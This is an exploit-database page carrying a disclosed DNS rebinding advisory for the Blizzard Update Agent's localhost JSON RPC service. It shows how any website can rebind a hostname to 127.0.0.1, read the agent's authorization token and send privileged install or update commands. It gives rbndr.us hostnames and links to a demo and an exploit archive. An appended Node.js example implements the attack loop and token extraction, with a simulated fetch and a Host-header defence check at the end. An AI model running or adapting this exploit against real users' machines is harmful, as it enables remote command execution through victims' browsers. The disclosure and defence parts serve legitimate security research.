0day.today - Biggest Exploit Database in the World.
Blizzard Update Agent - JSON RPC DNS Rebinding Vulnerability
All Blizzard games are installed alongside a shared tool called "Blizzard Update Agent"; investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed. The agent creates a JSON RPC server listening on localhost port 1120 and accepts commands to install, uninstall, change settings, update, and perform other maintenance-related operations. Blizzard uses a custom authentication scheme to verify that the RPCs come from a legitimate source. It looks like this:

    $ curl -si http://localhost:1120/agent
    HTTP/1.0 200 OK
    Content-Length: 359

    {
        "pid" : 3140.000000,
        "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
        "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
        "state" : 1004.000000,
        "version" : "2.13.4.5955",
        "region" : "us",
        "type" : "retail",
        "opt_in_feedback" : true,
        "session" : "15409717072196133548",
        "authorization" : "11A87920224BD1FB22AF5F868CA0E789"
    }

This endpoint is permitted without authentication, but all other requests must carry a valid "Authorization" header containing the token from that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is that they will be ignored because requests must prove they can read and write the authorization property.

I don't think this design will work because of an attack called "DNS rebinding". Any website can register a DNS name it controls, serve its page from that name so that the page's scripts are same-origin with it, and then make the name resolve to 127.0.0.1. The browser's same-origin policy is keyed on the hostname, not on the address it currently resolves to, so once the name flips the same scripts can read the /agent response, obtain the token, and issue authenticated requests. To be clear, this means that *any* website can send privileged commands to the agent.
I have a domain I use for testing called rbndr.us; you can use this page to generate hostnames: https://lock.cmpxchg8b.com/rebinder.html

Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:

    $ host 7f000001.c7f11de3.rbndr.us
    7f000001.c7f11de3.rbndr.us has address 127.0.0.1
    $ host 7f000001.c7f11de3.rbndr.us
    7f000001.c7f11de3.rbndr.us has address 199.241.29.227
    $ host 7f000001.c7f11de3.rbndr.us
    7f000001.c7f11de3.rbndr.us has address 127.0.0.1

Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch; the TTL is set to the minimum, but some servers round up). I just wait for the cached response to expire, and then POST commands to the server.

Exploitation would involve using network drives, or setting the destination to "Downloads" and making the browser install DLLs, data files, etc.

I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea! http://lock.cmpxchg8b.com/yah4od7N.html

See the attached screenshot of how it's supposed to look.

Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip

# 0day.today [2024-12-24] #
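The following is an added example written for this page; it is not the author's demo page, not Blizzard's agent code, and not part of the original advisory. It shows the mechanics the advisory describes in runnable Node.js: building an rbndr.us hostname (each label is the IPv4 address as eight hex digits, which is how 7f000001.c7f11de3 encodes 127.0.0.1 and 199.241.29.227), the attacker page's loop that keeps requesting /agent through that hostname until the cached answer expires and the request lands on the local agent, and extracting the token that all other requests must carry in the Authorization header. The fetch stand-in is constructed so the loop runs offline; in a browser you would pass window.fetch instead. The Host-header check at the end is the standard server-side defence against DNS rebinding and is not described in the advisory; all function names are this example's own.

```javascript
// Added example (not Tavis Ormandy's demo, not Blizzard's code). Node.js, no deps.
// rbndr.us label format, /agent reply and Authorization header: from the advisory.
// Poll loop, simulated fetch and Host-header check: this example's own illustration.

const AGENT_PORT = 1120;

// Copied from the advisory's curl output: the one endpoint that answers without
// authentication, handing out the token every other request needs.
const SAMPLE_AGENT_REPLY = `{
  "pid" : 3140.000000,
  "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
  "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
  "state" : 1004.000000,
  "version" : "2.13.4.5955",
  "region" : "us",
  "type" : "retail",
  "opt_in_feedback" : true,
  "session" : "15409717072196133548",
  "authorization" : "11A87920224BD1FB22AF5F868CA0E789"
}`;

// rbndr.us encodes each IPv4 address as eight hex digits: 127.0.0.1 -> 7f000001.
function ipToHex(ip) {
  const octets = ip.split('.').map(Number);
  if (octets.length !== 4 || octets.some(o => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error(`bad IPv4 address: ${ip}`);
  }
  return octets.map(o => o.toString(16).padStart(2, '0')).join('');
}

function hexToIp(hex) {
  if (!/^[0-9a-f]{8}$/i.test(hex)) throw new Error(`bad label: ${hex}`);
  return [0, 2, 4, 6].map(i => parseInt(hex.slice(i, i + 2), 16)).join('.');
}

// The rebinding hostname: the authoritative server alternates answers between
// the two addresses, so one origin points first at the attacker's web server
// and later at the victim's loopback interface.
function rebinderHost(ipA, ipB, zone = 'rbndr.us') {
  return `${ipToHex(ipA)}.${ipToHex(ipB)}.${zone}`;
}

// Distinguish the agent's JSON from whatever the attacker's own server returns
// for /agent; null means the name has not flipped to 127.0.0.1 yet.
function parseAgentInfo(body) {
  let obj;
  try { obj = JSON.parse(body); } catch (e) { return null; }
  if (!obj || typeof obj.authorization !== 'string' || typeof obj.session !== 'string') return null;
  return { authorization: obj.authorization, session: obj.session, version: obj.version, pid: obj.pid };
}

// The attacker page's loop: request /agent through the rebinding hostname until
// the browser's cached DNS answer expires and the request reaches the agent.
// fetchFn is injected so the loop can run offline (pass window.fetch in a browser).
async function waitForRebind(host, fetchFn, opts = {}) {
  const { maxAttempts = 120, delayMs = 1000,
          sleep = ms => new Promise(r => setTimeout(r, ms)) } = opts;
  const url = `http://${host}:${AGENT_PORT}/agent`;
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    try {
      const res = await fetchFn(url);
      const info = parseAgentInfo(await res.text());
      if (info) return { attempt, info };
    } catch (e) { /* refused or timed out while still on the attacker's address */ }
    await sleep(delayMs);
  }
  return null; // the name never flipped within the budget
}

// Per the advisory, every request other than /agent must carry the token.
function authorizedHeaders(info) {
  return { 'Authorization': info.authorization, 'Content-Type': 'application/json' };
}

// Constructed stand-in for fetch: the first `flipAfter` requests hit the
// attacker's server (an HTML page); later ones reach the local agent.
function simulatedFetch(flipAfter) {
  let calls = 0;
  return async () => {
    calls += 1;
    const body = calls <= flipAfter ? '<html>attacker page</html>' : SAMPLE_AGENT_REPLY;
    return { text: async () => body };
  };
}

// Defence (not from the advisory): a rebound request still carries the attacker's
// hostname in Host, so a loopback service can reject anything not addressed to
// one of its own names. Port suffix and bracketed IPv6 literals are handled.
const ALLOWED_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);
function hostHeaderAllowed(hostHeader) {
  if (typeof hostHeader !== 'string') return false;
  const m = /^(\[[0-9a-f:]+\]|[^:\s]+)(?::\d{1,5})?$/i.exec(hostHeader.trim());
  return m !== null && ALLOWED_HOSTS.has(m[1].toLowerCase());
}

if (typeof require !== 'undefined' && require.main === module) {
  const host = rebinderHost('127.0.0.1', '199.241.29.227'); // 7f000001.c7f11de3.rbndr.us
  waitForRebind(host, simulatedFetch(2), { sleep: async () => {} }).then(r => {
    console.log(`token after ${r.attempt} attempts:`, authorizedHeaders(r.info));
    console.log('Host check:', hostHeaderAllowed(`${host}:${AGENT_PORT}`), hostHeaderAllowed('localhost:1120'));
  });
}
```

Run it with `node rebind.js`: the simulated resolver flips after two requests, so the token is recovered on the third attempt, and the Host check rejects the rbndr.us name while accepting localhost. The check is only a defence if the service rejects on mismatch rather than merely logging it, and it must compare the name, not whatever address the name resolved to.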